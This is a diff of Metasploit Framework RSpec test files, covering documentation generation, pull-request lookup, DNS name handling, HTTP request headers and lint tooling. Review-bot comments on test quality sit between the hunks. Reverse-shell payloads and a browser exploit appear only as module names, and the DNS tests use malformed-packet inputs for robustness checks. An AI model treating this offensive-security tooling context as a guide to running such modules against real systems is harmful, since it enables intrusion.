ranks' do + wiki = 'https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking' + expect(subject.send(:normalize_rank, msf_mod.rank)).to include(wiki) + end + end + end + + describe 'load_demo_template' do + context 'when a BrowserExploitServer demo template path is given' do + it 'returns the demo' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::BES_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is also supported by Browser Autopwn 2') + end + end + end + + describe 'normalize_demo_output' do + context 'when the module is a kind of Msf::Exploit::Remote::HttpServer' do + it 'returns the demo of HTTPSERVER_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::HTTPSERVER_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include("use #{mod_fullname}") + end + end + + context 'when the module is a remote exploit' do + it 'returns the demo of REMOTE_EXPLOIT_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::REMOTE_EXPLOIT_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('it looks like this is a remote exploit module') + end + end + + context 'when the module is a kind of Msf::Exploit::Local' do + it 'returns the content of LOCALEXPLOIT_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::LOCALEXPLOIT_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('To run a local exploit, make sure you are at the msf prompt.') + end + end + + context 'when the module is a kind of Msf::Post' do + it 'returns the demo of POST_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::POST_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('There are two ways to execute this post module') + end + end + + context 'when the module is a kind of Msf::Payload' do + 
it 'returns the demo of PAYLOAD_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::PAYLOAD_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('> generate') + end + end + + context 'when the module is a kind of Msf::Auxiliary::Scanner' do + it 'returns the demo of AUXILIARY_SCANNER_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::AUXILIARY_SCANNER_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is a scanner module') + end + end + + context 'when the module does not have a known kind' do + it 'returns the demo of GENERIC_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::GENERIC_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('msf exploit') + end + end + end + +end diff --git a/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb new file mode 100644 index 0000000000..edd19163b8 --- /dev/null +++ b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb 
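Review bot: Every example under `describe 'normalize_demo_output'` in the new `normalizer_spec.rb` calls `load_demo_template` with a hand-picked template constant, so the method named in the `describe` is never invoked and its choice of template per module kind goes untested. The contexts read 'when the module is a kind of Msf::Exploit::Remote::HttpServer' and so on, yet `msf_mod` is the same plain double in all of them. Either move these examples under `describe 'load_demo_template'`, where they belong as written, or make each context's double look like the kind of module it names and assert on the result of `normalize_demo_output` itself (its signature is not visible in this diff).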
@@ -0,0 +1,162 @@
+require 'rex'
+require 'msf/util/document_generator'
+require 'octokit'
+require 'net/http'
+
+RSpec.describe Msf::Util::DocumentGenerator::PullRequestFinder do
+
+ let(:author_name) { 'name' }
+
+ let(:commit) do
+ c = double('commit')
+ allow(c).to receive(:author).and_return({author: author_name, login: author_name})
+ allow(c).to receive(:sha).and_return('sha')
+ c
+ end
+
+ let(:commits) do
+ [ commit ]
+ end
+
+ let(:pr_num) { '5486' }
+
+ let(:html) do
+ %Q|
+ <html>
+ <head></head>
+ <body>
+ <li class="pull-request">(<a href="/rapid7/metasploit-framework/pull/#{pr_num}" title="Merged Pull Request: adobe_flash_copy_pixels_to_byte_array: Execution from the flash renderer / Windows 8.1">##{pr_num}</a>)</li>
+ </body>
+ </html>
+ |
+ end
+
+ subject do
+ obj = described_class.new
+ obj.git_access_token = 'GITHUB_AUTH_TOKEN'
+
+ octo = Octokit::Client.new
+ allow(octo).to receive(:commits).and_return(commits)
+ allow(obj).to receive(:git_client).and_return(octo)
+ obj
+ end
+
+ let(:http_response) do
+ req = double('HttpResponse')
+ allow(req).to receive(:body).and_return(html)
+ req
+ end
+
+ let(:module_name) { 'modules/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb' }
+
+ let(:msf_mod) do
+ mod = double('Msf::Module')
+ init = double('Msf::Module#initialize')
+ allow(init).to receive(:source_location).and_return([ module_name ])
+ allow(mod).to receive(:method).with(any_args).and_return(init)
+ mod
+ end
+
+ before(:each) do
+ allow(ENV).to receive(:has_key?).and_return(true)
+ allow_any_instance_of(Net::HTTP).to receive(:request).with(any_args).and_return(http_response)
+ end
+
+ describe '#initialize' do
+ it 'sets the owner property' do
+ expect(subject.owner).to eq('rapid7')
+ end
+
+ it 'sets the repository' do
+ expect(subject.repository).to eq('rapid7/metasploit-framework')
+ end
+
+ it 'sets the branch' do
+ expect(subject.branch).to eq('master')
+ end
+
+ it 'sets the git access token' do
+ subject1 = described_class.new
+ subject1.git_access_token = 'FAKE KEY'
+ subject2 = described_class.new
+ expect(subject2.git_access_token).not_to eq(subject1.git_access_token)
+ end
+
+ it 'sets Octokit::Client' do
+ expect(subject.git_client).to be_kind_of(Octokit::Client)
+ end
+ end
+
+ describe '#search' do
+ context 'when a module is given' do
+ it 'returns a hash of pull requests' do
+ result = subject.search(msf_mod)
+ expect(result).to be_kind_of(Hash)
+ expect(result.keys.first).to eq(pr_num)
+ expect(result.first[1][:number]).to eq(pr_num)
+ expect(result.first[1][:title]).to include('Merged Pull Request')
+ end
+ end
+ end
+
+ describe '#get_normalized_module_name' do
+ context 'when a module is given' do
+ it 'returns the module name' do
+ expect(subject.send(:get_normalized_module_name, msf_mod)).to eq(module_name)
+ end
+ end
+ end
+
+ describe '#get_commits_from_file' do
+ context 'when a module path is given' do
+ it 'returns commits' do
+ expect(subject.send(:get_commits_from_file, module_name)).to eq(commits)
+ end
+ end
+ end
+
+ describe '#get_author' do
+ context 'when a commit is given' do
+ it 'returns the author name' do
+ expect(subject.send(:get_author, commit)).to eq(author_name)
+ end
+ end
+ end
+
+ describe '#is_author_blacklisted?'
do
+ context 'when a commit authored by tabassassin is given' do
+ it 'returns true' do
+ c = double('commit')
+ allow(c).to receive(:author).and_return({author: 'tabassassin', login: 'tabassassin'})
+ expect(subject.send(:is_author_blacklisted?, c)).to be_truthy
+ end
+ end
+
+ context 'when a commit authored by a human is given' do
+ it 'returns false' do
+ expect(subject.send(:is_author_blacklisted?, commit)).to be_falsey
+ end
+ end
+ end
+
+ describe '#get_pull_requests_from_commits' do
+ context 'when commits are given' do
+ it 'returns pull requests' do
+ pr = subject.send(:get_pull_requests_from_commits, commits)
+ expect(pr).to be_kind_of(Hash)
+ expect(pr.keys.first).to eq(pr_num)
+ end
+ end
+ end
+
+ describe '#get_pull_request_from_commit' do
+ context 'when a commit is given' do
+ it 'returns a pull request' do
+ pr = subject.send(:get_pull_request_from_commit, commit)
+ expect(pr).to be_kind_of(Hash)
+ expect(pr[:number]).to eq(pr_num)
+ end
+ end
+ end
+
+end
diff --git a/spec/lib/net/dns/names/names_spec.rb b/spec/lib/net/dns/names/names_spec.rb
new file mode 100644
index 0000000000..96ea39a86f
--- /dev/null
+++ b/spec/lib/net/dns/names/names_spec.rb
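Review bot: The 'sets the git access token' example under `describe '#initialize'` only asserts that a fresh instance's token differs from one that was just assigned 'FAKE KEY', so it passes whatever the constructor does with the credential and pins nothing about where the token comes from. The `before(:each)` stub `allow(ENV).to receive(:has_key?).and_return(true)` suggests the class consults the environment, but that is inferred because the class itself is not in this hunk. The stub also answers true for every key, which can change the behaviour of unrelated code run inside these examples. Narrowing it to the one variable the class reads, `allow(ENV).to receive(:has_key?).with('<TOKEN_ENV_NAME>').and_return(true)` (placeholder name), and asserting the resulting `git_access_token` value directly would make the example meaningful.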
@@ -0,0 +1,129 @@ +require 'msf/core' + +RSpec.describe Net::DNS::Names do + subject do + obj = Object.new + obj.extend(described_class) + end + + describe '#dn_expand' do + context 'when offset is great than packet length' do + let(:packet) do + 'AAAAA' + end + + let(:offset) do + 10 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + + context 'when packet length is less than offset + INT16SZ' do + let(:packet) do + "\xc0" + end + + let(:offset) do + 0 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + + context 'when packet length is less than offset + packet length' do + let(:packet) do + 'AAAAA' + end + + let(:offset) do + 4 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + end + + describe '#pack_name' do + context 'when name data size is larger than 255 bytes' do + let(:name) do + 'A' * (255+1) + end + + it 'raises an ArgumentError exception' do + expect { subject.pack_name(name) }.to raise_exception(ArgumentError) + end + end + + context 'when label data is larger than 63 bytes' do + let(:name) do + 'A' * (63+1) + '.' + end + + it 'raises an ArgumentError exception' do + expect { subject.pack_name(name) }.to raise_exception(ArgumentError) + end + end + end + + describe '#names_array' do + let(:name) do + "AAA.AAA" + end + + it 'returns an Array' do + expect(subject.names_array(name)).to be_kind_of(Array) + end + end + + describe '#dn_comp' do + let(:name) do + 'AAAA' + end + + let(:offset) do + 0 + end + + let(:compnames) do + {} + end + + it 'returns 3 values' do + v = subject.dn_comp(name, offset, compnames) + expect(v.length).to eq(3) + expect(v[0]).to be_kind_of(String) + expect(v[1]).to be_kind_of(Fixnum) + expect(v[2]).to be_kind_of(Hash) + end + end + + describe '#valid?' 
do + context 'when FQDN is valid' do + let(:fqdn) do + 'example.com' + end + + it 'returns the FQDN' do + expect(subject.valid?(fqdn)).to eq(fqdn) + end + + end + + context 'when FQDN is not valid' do + let(:fqdn) do + 'INVALID' + end + + it 'raises ArgumentError exception' do + expect { subject.valid?(fqdn) }.to raise_exception(ArgumentError) + end + end + end +end \ No newline at end of file diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 4be1ce6a77..1497ebaa9e 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -20,7 +20,7 @@ RSpec.describe Rex::Post::Meterpreter::PacketParser do it "should initialise with expected defaults" do expect(parser.send(:raw)).to eq "" - expect(parser.send(:hdr_length_left)).to eq 8 + expect(parser.send(:hdr_length_left)).to eq 12 expect(parser.send(:payload_length_left)).to eq 0 end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 644e576a5c..454850ee86 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -151,7 +151,26 @@ RSpec.describe Rex::Proto::Http::ClientRequest do { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } - ] + ], + + [ + "with modified Content-Length header", + default_options.merge({ + 'headers' => { 'Content-Length' => 1337 } + }), + { + :set_content_len_header => { args: 0, result: ''} + } + ], + + [ + "with 1024 bytes of Content-Length", + default_options, + { + :set_content_len_header => { args: 1024, result: "Content-Length: 1024\r\n"} + } + ], + ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 0bbe2cf9d3..528b41f0da 100644 --- a/spec/modules/payloads_spec.rb 
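Review bot: The `#dn_expand` examples only cover packets that are too short for the requested offset, so nothing in this new spec exercises a compression pointer that refers back to its own offset, the malformed input most likely to make a name expander loop or recurse without bound. Adding a context with a two-byte pointer to offset 0 that expects a clean failure would pin that behaviour. The expected exception class below is assumed from the neighbouring examples and should be confirmed against the implementation, which is not part of this hunk. Separately, `be_kind_of(Fixnum)` in `#dn_comp` is better written `be_kind_of(Integer)`, since Fixnum was merged into Integer in Ruby 2.4 and later removed.

```ruby
  describe '#dn_expand' do
    # … unchanged: the three short-packet contexts …

    context 'when a compression pointer refers to its own offset' do
      let(:packet) do
        "\xc0\x00"
      end

      let(:offset) do
        0
      end

      it 'raises an ExpandError exception' do
        expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError)
      end
    end
```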
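Review bot: The new 'with modified Content-Length header' case calls `set_content_len_header` with `args: 0`, so if the method already returns an empty string for a zero-length body (not visible from this hunk), the example passes even when the caller-supplied header is ignored. A non-zero length, `:set_content_len_header => { args: 1024, result: '' }`, would show that the explicit `'Content-Length' => 1337` header is what suppresses the generated one. The array of cases this entry is appended to begins outside the hunk.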
+++ b/spec/modules/payloads_spec.rb @@ -1637,16 +1637,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/x86/shell_reverse_tcp' end - context 'linux/x86/shell_reverse_tcp2' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/x86/shell_reverse_tcp2' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/shell_reverse_tcp2' - end - context 'mainframe/shell_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 90be4e8a0a..0859ab6424 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -1,4 +1,6 @@ # -*- coding: binary -*- +require 'stringio' + ENV['RAILS_ENV'] = 'test' unless Bundler.settings.without.include?(:coverage) @@ -114,3 +116,25 @@ end Metasploit::Framework::Spec::Constants::Suite.configure! Metasploit::Framework::Spec::Threads::Suite.configure! + +def get_stdout(&block) + out = $stdout + $stdout = tmp = StringIO.new + begin + yield + ensure + $stdout = out + end + tmp.string +end + +def get_stderr(&block) + out = $stderr + $stderr = tmp = StringIO.new + begin + yield + ensure + $stderr = out + end + tmp.string +end diff --git a/spec/tools/dev/msftidy_spec.rb b/spec/tools/dev/msftidy_spec.rb new file mode 100644 index 0000000000..bf9f115f85 --- /dev/null +++ b/spec/tools/dev/msftidy_spec.rb 
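Review bot: `get_stdout` and `get_stderr` are added with a bare `def` at the top level of spec_helper.rb, which makes them private methods on Object for the whole test process rather than helpers scoped to examples, and the `&block` parameter is unused because the body calls `yield`. Moving them into a module that RSpec includes keeps the same call sites working while limiting their reach; RSpec's built-in `output(...).to_stdout` matcher also covers the simple cases. Both helpers swap a process-global stream, so captured output can be mixed up if examples ever run concurrently.

```ruby
module OutputCapture
  def get_stdout
    # … unchanged: swap $stdout for a StringIO, yield, restore in ensure, return the string …
  end

  def get_stderr
    # … unchanged: same handling for $stderr …
  end
end

RSpec.configure do |config|
  config.include OutputCapture
end
```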
@@ -0,0 +1,48 @@ +require 'spec_helper' + +load Metasploit::Framework.root.join('tools/dev/msftidy.rb').to_path + +RSpec.describe Msftidy do + context "with a tidy auxiliary module" do + let(:auxiliary_tidy) { File.expand_path('modules/auxiliary/auxiliary_tidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(auxiliary_tidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "outputs nothing" do + expect(@msftidy_stdout).to be_empty + end + end + + context "with an untidy auxiliary module" do + let(:auxiliary_untidy) { File.expand_path('modules/auxiliary/auxiliary_untidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(auxiliary_untidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "ERRORs when invalid superclass" do + expect(@msftidy_stdout).to match(/ERROR.*Invalid super class for auxiliary module/) + end + + it "WARNINGs when specifying Rank" do + expect(@msftidy_stdout).to match(/WARNING.*Rank/) + end + end + + context "with a tidy payload module" do + let(:payload_tidy) { File.expand_path('modules/payloads/payload_tidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(payload_tidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "outputs nothing" do + expect(@msftidy_stdout).to be_empty + end + end +end diff --git a/spec/tools/egghunter_spec.rb b/spec/tools/egghunter_spec.rb index efcebca0e1..d56dac3ecf 100644 --- a/spec/tools/egghunter_spec.rb +++ b/spec/tools/egghunter_spec.rb @@ -1,6 +1,5 @@ load Metasploit::Framework.root.join('tools/exploit/egghunter.rb').to_path - -require 'stringio' +require 'spec_helper' RSpec.describe Egghunter do 
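Review bot: All three contexts fill `@msftidy_stdout` from an identical `before(:each)` block, which repeats the capture and passes state through an instance variable where the rest of the file uses `let`. A memoized helper declared once at the top of the describe block, `let(:msftidy_stdout) { get_stdout { msftidy.run_checks } }`, lets the examples read `msftidy_stdout` and removes the three `before` blocks. Only stdout is captured, so the 'outputs nothing' examples would not notice a message msftidy wrote to stderr; whether it ever does is not visible from this hunk.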
@@ -16,17 +15,6 @@ RSpec.describe Egghunter do describe '#run' do - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - let(:default_opts) { { :platform => 'windows', :format => 'c', :eggtag => egg, :arch => 'x86' } } diff --git a/spec/tools/md5_lookup_spec.rb b/spec/tools/md5_lookup_spec.rb index 528f7863cd..f9666d0a0d 100644 --- a/spec/tools/md5_lookup_spec.rb +++ b/spec/tools/md5_lookup_spec.rb @@ -1,4 +1,5 @@ load Metasploit::Framework.root.join('tools/password/md5_lookup.rb').to_path +require 'spec_helper' require 'rex/proto/http/response' require 'stringio' @@ -70,17 +71,6 @@ RSpec.describe Md5LookupUtility do end end - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - # # Tests start here # diff --git a/spec/tools/msu_finder_spec.rb b/spec/tools/msu_finder_spec.rb deleted file mode 100644 index 8f1b498c9c..0000000000 --- a/spec/tools/msu_finder_spec.rb +++ /dev/null 
@@ -1,662 +0,0 @@ -load Metasploit::Framework.root.join('tools/exploit/msu_finder.rb').to_path - -require 'nokogiri' -require 'uri' - -RSpec.describe MicrosoftPatchFinder do - - before(:example) do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(Rex::Proto::Http::Response.new) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - end - - let(:technet) do - MicrosoftPatchFinder::SiteInfo::TECHNET - end - - let(:microsoft) do - MicrosoftPatchFinder::SiteInfo::MICROSOFT - end - - let(:googleapis) do - MicrosoftPatchFinder::SiteInfo::GOOGLEAPIS - end - - describe MicrosoftPatchFinder::SiteInfo do - context 'Constants' do - context 'TECHNET' do - it 'returns 157.56.148.23 as the IP' do - expect(technet[:ip]).to eq('157.56.148.23') - end - - it 'returns technet.microsoft.com as the vhost' do - expect(technet[:vhost]).to eq('technet.microsoft.com') - end - end - - context 'MICROSOFT' do - it 'returns 104.72.230.162 as the IP' do - expect(microsoft[:ip]).to eq('104.72.230.162') - end - - it 'returns www.microsoft.com as the vhost' do - expect(microsoft[:vhost]).to eq('www.microsoft.com') - end - end - - context 'GOOGLEAPIS' do - it 'returns 74.125.28.95 as the IP' do - expect(googleapis[:ip]).to eq('74.125.28.95') - end - - it 'returns www.googleapis.com as the vhost' do - expect(googleapis[:vhost]).to eq('www.googleapis.com') - end - end - end - end - - describe MicrosoftPatchFinder::Helper do - - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - - def get_stderr(&block) - out = $stderr - $stderr = fake = StringIO.new - begin - yield - ensure - $stderr = out - end - fake.string - end - - subject(:object_helper) do - mod = Object.new - mod.extend MicrosoftPatchFinder::Helper - mod - end - - describe '#print_debug' do - it 'prints a [DEBUG] message' do 
- output = get_stderr { object_helper.print_debug } - expect(output).to include('[DEBUG]') - end - end - - describe '#print_status' do - it 'prints a [*] message' do - output = get_stderr { object_helper.print_status } - expect(output).to include('[*]') - end - end - - describe '#print_error' do - it 'prints an [ERROR] message' do - output = get_stderr { object_helper.print_error } - expect(output).to include('[ERROR]') - end - end - - describe '#print_line' do - it 'prints a regular message' do - msg = 'TEST' - output = get_stdout { object_helper.print_line(msg) } - expect(output).to eq("#{msg}\n") - end - end - - describe '#send_http_request' do - it 'returns a Rex::Proto::Http::Response object' do - allow(object_helper).to receive(:print_debug) - res = object_helper.send_http_request(MicrosoftPatchFinder::SiteInfo::TECHNET) - expect(res).to be_kind_of(Rex::Proto::Http::Response) - end - end - - end - - describe MicrosoftPatchFinder::PatchLinkCollector do - - let(:ms15_100_html) do - %Q| - <html> - <div id="mainBody"> - <div> - <h2> - <div> - <span>Affected Software</span> - <div class="sectionblock"> - <table> - <tr><td><a href="https://www.microsoft.com/downloads/details.aspx?familyid=1">fake link</a></td></tr> - </table> - </div> - </div> - </h2> - </div> - </div> - </html> - | - end - - let(:ms07_029_html) do - %Q| - <html> - <div id="mainBody"> - <ul> - <li> - <a href="http://technet.microsoft.com">Download the update</a> - </li> - </ul> - </div> - </html> - | - end - - let(:ms03_039_html) do - %Q| - <html> - <div id="mainBody"> - <div> - <div class="sectionblock"> - <p> - <strong>Download locations</strong> - </p> - <ul> - <li> - <a href="http://technet.microsoft.com">Download</a> - </li> - </ul> - </div> - </div> - </div> - </html> - | - end - - let(:ms07_030_html) do - %Q| - <html> - <div id="mainBody"> - <p> - <strong>Affected Software</strong> - </p> - <table> - <tr><td><a href="http://technet.microsoft.com">Download</a></td></tr> - </div> - </html> - | 
- end - - subject(:patch_link_collector) do - MicrosoftPatchFinder::PatchLinkCollector.new - end - - before(:example) do - allow(patch_link_collector).to receive(:print_debug) - end - - describe '#download_advisory' do - it 'returns a Rex::Proto::Http::Response object' do - res = patch_link_collector.download_advisory('ms15-100') - expect(res).to be_kind_of(Rex::Proto::Http::Response) - end - end - - describe '#get_appropriate_pattern' do - - it 'returns a pattern for ms15-100' do - expected_pattern = '//div[@id="mainBody"]//div//div[@class="sectionblock"]//table//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms15_100_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms07-029' do - expected_pattern = '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms07_029_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms03-039' do - expected_pattern = '//div[@id="mainBody"]//div//div[@class="sectionblock"]//ul//li//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms03_039_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms07-030' do - expected_pattern = '//div[@id="mainBody"]//table//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms07_030_html)) - expect(p).to eq(expected_pattern) - end - end - - describe '#get_details_aspx' do - let(:details_aspx) do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(ms15_100_html) - res - end - - it 'returns an URI object to a details aspx' do - links = patch_link_collector.get_details_aspx(details_aspx) - expected_uri = 'https://www.microsoft.com/downloads/details.aspx?familyid=1' - expect(links.length).to eq(1) - expect(links.first).to be_kind_of(URI) - expect(links.first.to_s).to eq(expected_uri) - end - end - - describe '#follow_redirect' do - 
let(:expected_header) do - { 'Location' => 'http://example.com/' } - end - - let(:http_res) do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:headers).and_return(expected_header) - res - end - - it 'goes to a location based on the Location HTTP header' do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(http_res) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - - expect(patch_link_collector.follow_redirect(technet, http_res).headers).to eq(expected_header) - end - end - - describe '#get_download_page' do - it 'returns a Rex::Proto::Http::Response object' do - uri = URI('http://www.example.com/') - expect(patch_link_collector.get_download_page(uri)).to be_kind_of(Rex::Proto::Http::Response) - end - end - - describe '#get_download_links' do - let(:confirm_aspx) do - %Q| - <html> - <a href="https://www.microsoft.com/en-us/download/confirmation.aspx?id=1">Download</a> - </html> - | - end - - let(:expected_link) do - 'http://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' - end - - let(:download_html_res) do - Rex::Proto::Http::Response.new.tap { |response| - allow(response).to receive(:body).and_return( - %Q| - <html> - <a href="#{expected_link}">Click here</a> - </html> - | - ) - } - end - - it 'returns an array of links' do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(download_html_res) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - - expect(patch_link_collector.get_download_links(confirm_aspx).first).to eq(expected_link) - end - end - - describe '#has_advisory?' 
do - it 'returns true if the page is found' do - res = Rex::Proto::Http::Response.new - expect(patch_link_collector.has_advisory?(res)).to be_truthy - end - - it 'returns false if the page is not found' do - html = %Q| - <html> - We are sorry. The page you requested cannot be found - </html> - | - - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(html) - expect(patch_link_collector.has_advisory?(res)).to be_falsey - end - end - - describe '#is_valid_msb?' do - let(:good_msb) do - 'MS15-100' - end - - let(:bad_msb) do - 'MS15-01' - end - - it 'returns true if the MSB format is correct' do - expect(patch_link_collector.is_valid_msb?(good_msb)).to be_truthy - end - - it 'returns false if the MSB format is incorrect' do - expect(patch_link_collector.is_valid_msb?(bad_msb)).to be_falsey - end - - end - - end - - describe MicrosoftPatchFinder::TechnetMsbSearch do - - subject(:technet_msb_search) do - MicrosoftPatchFinder::TechnetMsbSearch.new - end - - before(:example) do - allow_any_instance_of(MicrosoftPatchFinder::TechnetMsbSearch).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::TechnetMsbSearch).to receive(:send_http_request) { |info_obj, info_opts, opts| - case opts['uri'] - when /\/en\-us\/security\/bulletin\/dn602597\.aspx/ - html = %Q| - <div class="sb-search"> - <div class="SearchBox"> - <input type="text" id="txtSearch" title="Search Security Bulletins" value="Search Security Bulletins" /> - <input type="button" id="btnSearch" /> - </div> - <select id="productDropdown"> - <option value="-1">All</option> - <option value="10175">Active Directory</option> - <option value="10401">Windows Internet Explorer 10</option> - <option value="10486">Windows Internet Explorer 11</option> - <option value="1282">Windows Internet Explorer 7</option> - <option value="1233">Windows Internet Explorer 8</option> - <option value="10054">Windows Internet Explorer 9</option> - </select> - </div> - | - when 
/\/security\/bulletin\/services\/GetBulletins/ - html = %Q|{ - "l":1, - "b":[ - { - "d":"9/8/2015", - "Id":"MS15-100", - "KB":"3087918", - "Title":"Vulnerability in Windows Media Center Could Allow Remote Code Execution", - "Rating":"Important" - } - ] - } - | - else - html = '' - end - - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(html) - res - } - end - - let(:ie10) do - 'Windows Internet Explorer 10' - end - - let(:ie10_id) do - 10401 - end - - describe '#find_msb_numbers' do - it 'returns an array of found MSB numbers' do - msb = technet_msb_search.find_msb_numbers(ie10) - expect(msb).to be_kind_of(Array) - expect(msb.first).to eq('ms15-100') - end - end - - describe '#search' do - it 'returns search results in JSON format' do - results = technet_msb_search.search(ie10) - expect(results).to be_kind_of(Hash) - expect(results['b'].first['Id']).to eq('MS15-100') - end - end - - describe '#search_by_product_ids' do - it 'returns an array of found MSB numbers' do - results = technet_msb_search.search_by_product_ids([ie10_id]) - expect(results).to be_kind_of(Array) - expect(results.first).to eq('ms15-100') - end - end - - describe '#search_by_keyword' do - it 'returns an array of found MSB numbers' do - results = technet_msb_search.search_by_keyword('ms15-100') - expect(results).to be_kind_of(Array) - expect(results.first).to eq('ms15-100') - end - end - - describe '#get_product_dropdown_list' do - it 'returns an array of products' do - results = technet_msb_search.get_product_dropdown_list - expect(results).to be_kind_of(Array) - expect(results.first).to be_kind_of(Hash) - expected_hash = {:option_value=>"10175", :option_text=>"Active Directory"} - expect(results.first).to eq(expected_hash) - end - end - - end - - describe MicrosoftPatchFinder::GoogleMsbSearch do - - subject(:google_msb_search) do - MicrosoftPatchFinder::GoogleMsbSearch.new - end - - let(:json_data) do - %Q|{ - "kind": "customsearch#search", - "url": { - "type": 
"application/json", - "template": "" - }, - "queries": { - "request": [ - { - "title": "Google Custom Search - internet", - "totalResults": "1", - "searchTerms": "internet", - "count": 10, - "startIndex": 1, - "inputEncoding": "utf8", - "outputEncoding": "utf8", - "safe": "off", - "cx": "" - } - ] - }, - "context": { - "title": "Technet.microsoft" - }, - "searchInformation": { - "searchTime": 0.413407, - "formattedSearchTime": "0.41", - "totalResults": "1", - "formattedTotalResults": "1" - }, - "items": [ - { - "kind": "customsearch#result", - "title": "Microsoft Security Bulletin MS15-093 - Critical", - "htmlTitle": "Microsoft Security Bulletin MS15-093 - Critical", - "link": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "displayLink": "technet.microsoft.com", - "snippet": "", - "htmlSnippet": "", - "cacheId": "2xDJB6zqL_sJ", - "formattedUrl": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "htmlFormattedUrl": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "pagemap": { - "metatags": [ - { - "search.mshkeyworda": "ms15-093", - "search.mshattr.assetid": "ms15-093", - "search.mshattr.docset": "bulletin", - "search.mshattr.sarticletype": "bulletin", - "search.mshattr.sarticleid": 